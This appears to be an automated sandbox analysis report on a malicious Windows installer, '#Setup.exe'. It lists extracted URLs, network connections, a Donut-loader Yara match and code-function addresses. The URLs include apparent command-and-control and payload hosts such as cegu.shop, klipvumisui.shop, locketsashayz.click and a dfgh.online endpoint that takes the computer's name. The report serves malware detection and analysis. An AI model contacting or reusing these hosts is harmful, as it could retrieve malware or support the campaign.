Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: powershell.exe, 00000005.00000002.2361342386.0000000004741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: powershell.exe, 00000005.00000002.2361342386.0000000004896000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: BrightLib.exe, 00000026.00000002.2955581758.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000026.00000000.2908320125.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.autohotkey.com
Source: BrightLib.exe, 00000026.00000002.2955581758.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000026.00000000.2908320125.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.autohotkey.comCould
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: #Setup.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: #Setup.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: BrightLib.exe, 00000026.00000002.2981257670.000000003A069000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: #Setup.exe	String found in binary or memory: http://www.innosetup.com/
Source: #Setup.exe	String found in binary or memory: http://www.remobjects.com/ps
Source: #Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: #Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: #Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225979808.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.2361342386.0000000004741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: #Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225979808.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000797000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000797000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.0000000000712000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000797000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/u
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: https://certs.securetrust.com/CA0
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: https://certs.securetrust.com/CA05
Source: #Setup.exe, 00000000.00000003.2422784890.000000000075F000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: https://certs.securetrust.com/CA0:
Source: #Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225979808.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: #Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225979808.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000005.00000002.2374022259.00000000057AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2374022259.00000000057AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2374022259.00000000057AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.2361342386.0000000004896000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online
Source: powershell.exe, 00000005.00000002.2361342386.0000000004ADE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 00000005.00000002.2361342386.0000000004896000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
Source: powershell.exe, 00000005.00000002.2360776155.0000000000B90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compname=
Source: #Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: #Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: #Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000005.00000002.2361342386.0000000004896000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.2361342386.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://jrsoftware.org/
Source: #Setup.exe, 00000000.00000003.2373901214.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2373739539.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe, 00000007.00000000.2432249699.0000000000FC1000.00000020.00000001.01000000.00000008.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://jrsoftware.org0
Source: #Setup.exe, 00000000.00000002.2434984342.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2422345792.00000000007A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/=
Source: #Setup.exe, 00000000.00000002.2434984342.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2422345792.00000000007A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/er
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2422345792.0000000000797000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000797000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000766000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000797000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtL
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000766000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtrrF1Kye
Source: #Setup.exe, 00000000.00000003.2237198959.0000000003799000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2306796493.0000000000719000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2268384150.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2248628442.000000000379B000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2268324810.000000000379D000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2237282717.00000000037A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/api
Source: #Setup.exe, 00000000.00000003.2237198959.0000000003799000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2237282717.00000000037A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/api.x
Source: #Setup.exe, 00000000.00000002.2439009480.000000000379C000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2288417455.00000000037A3000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2287908931.0000000003796000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2307693390.00000000037A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/api=u
Source: #Setup.exe, 00000000.00000003.2268324810.000000000379D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/apiGuN
Source: #Setup.exe, 00000000.00000003.2268384150.00000000007A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/apiK
Source: #Setup.exe, 00000000.00000003.2249715456.00000000037D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/apiZ9NjAAA=A
Source: #Setup.exe, 00000000.00000003.2248628442.00000000037D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/apiZ9NjAAA=~
Source: #Setup.exe, 00000000.00000003.2268384150.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/apist
Source: #Setup.exe, 00000000.00000003.2287972610.00000000007A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/i
Source: #Setup.exe, 00000000.00000003.2248737423.00000000007A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/i7
Source: #Setup.exe, 00000000.00000003.2237198959.0000000003799000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2237282717.000000000379E000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2238526832.0000000003795000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/n
Source: #Setup.exe, 00000000.00000002.2439009480.000000000379C000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2287908931.0000000003796000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2248628442.000000000379B000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2268324810.000000000379D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/pi
Source: #Setup.exe, 00000000.00000002.2439009480.000000000379C000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2287908931.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/s
Source: #Setup.exe, 00000000.00000002.2439009480.000000000379C000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2288417455.00000000037A3000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2287908931.0000000003796000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2307693390.00000000037A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click/ts
Source: #Setup.exe, 00000000.00000003.2306796493.00000000006EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locketsashayz.click:443/api
Source: powershell.exe, 00000005.00000002.2374022259.00000000057AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: https://ssl.trustwave.com/CA03
Source: #Setup.exe, 00000000.00000003.2255904884.00000000038B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: #Setup.exe, 00000000.00000003.2255904884.00000000038B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: #Setup.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: #Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225979808.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: #Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.exe, 00000007.00000003.2446954266.000000007FB1B000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe, 00000007.00000003.2436592602.000000000321F000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000000.2452326416.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000000.2477869264.0000000000D0D000.00000020.00000001.01000000.0000000C.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.10.dr	String found in binary or memory: https://www.innosetup.com/
Source: #Setup.exe, 00000000.00000003.2252526923.00000000037E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: #Setup.exe, 00000000.00000003.2252526923.00000000037E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: #Setup.exe, 00000000.00000003.2255904884.00000000038B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: #Setup.exe, 00000000.00000003.2255904884.00000000038B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: #Setup.exe, 00000000.00000003.2255904884.00000000038B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.exe, 00000007.00000003.2446954266.000000007FB1B000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe, 00000007.00000003.2436592602.000000000321F000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000000.2452326416.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000000.2477869264.0000000000D0D000.00000020.00000001.01000000.0000000C.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.10.dr	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.6:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.6:49805 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Sample or dropped binary is a compiled AutoHotkey binary

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe

Window found: window name: AutoHotkey

Source: C:\Users\user\Desktop\#Setup.exe

Code function: 0_2_0299E7D7 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,

0_2_0299E7D7

Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0299E7D7	0_2_0299E7D7
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02950417	0_2_02950417
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0296E224	0_2_0296E224
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02984264	0_2_02984264
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0298A384	0_2_0298A384
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_029733B4	0_2_029733B4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02982304	0_2_02982304
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_029760D4	0_2_029760D4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_029900F4	0_2_029900F4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02980075	0_2_02980075
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_029631F4	0_2_029631F4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02970117	0_2_02970117
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02989134	0_2_02989134
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0295A144	0_2_0295A144
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02957144	0_2_02957144
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02957694	0_2_02957694
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_029896A4	0_2_029896A4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0297D60D	0_2_0297D60D
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02972624	0_2_02972624
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0297164D	0_2_0297164D
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0297F705	0_2_0297F705
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02954744	0_2_02954744
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0298777D	0_2_0298777D
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02956424	0_2_02956424
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0296D425	0_2_0296D425
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_029625DE	0_2_029625DE
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_029905D4	0_2_029905D4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_029685FC	0_2_029685FC
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0296E544	0_2_0296E544
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0298D544	0_2_0298D544
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02960A86	0_2_02960A86
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02968AAE	0_2_02968AAE
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0296EA04	0_2_0296EA04
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0297EA21	0_2_0297EA21
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02957A44	0_2_02957A44
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02982A7E	0_2_02982A7E
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02961A6A	0_2_02961A6A
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02988BB4	0_2_02988BB4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02973BAB	0_2_02973BAB
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02990B44	0_2_02990B44
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0297FB61	0_2_0297FB61
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0296A8E4	0_2_0296A8E4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02965874	0_2_02965874
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02990874	0_2_02990874
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02979865	0_2_02979865
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02977914	0_2_02977914
